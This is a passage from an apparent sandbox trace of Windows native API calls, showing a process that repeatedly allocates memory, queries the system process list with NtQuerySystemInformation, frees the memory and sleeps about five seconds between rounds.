BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.715] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.723] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.732] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.741] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.796] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.803] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.817] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.830] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.837] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.845] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.852] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.859] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.866] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.873] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.880] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.888] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.895] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 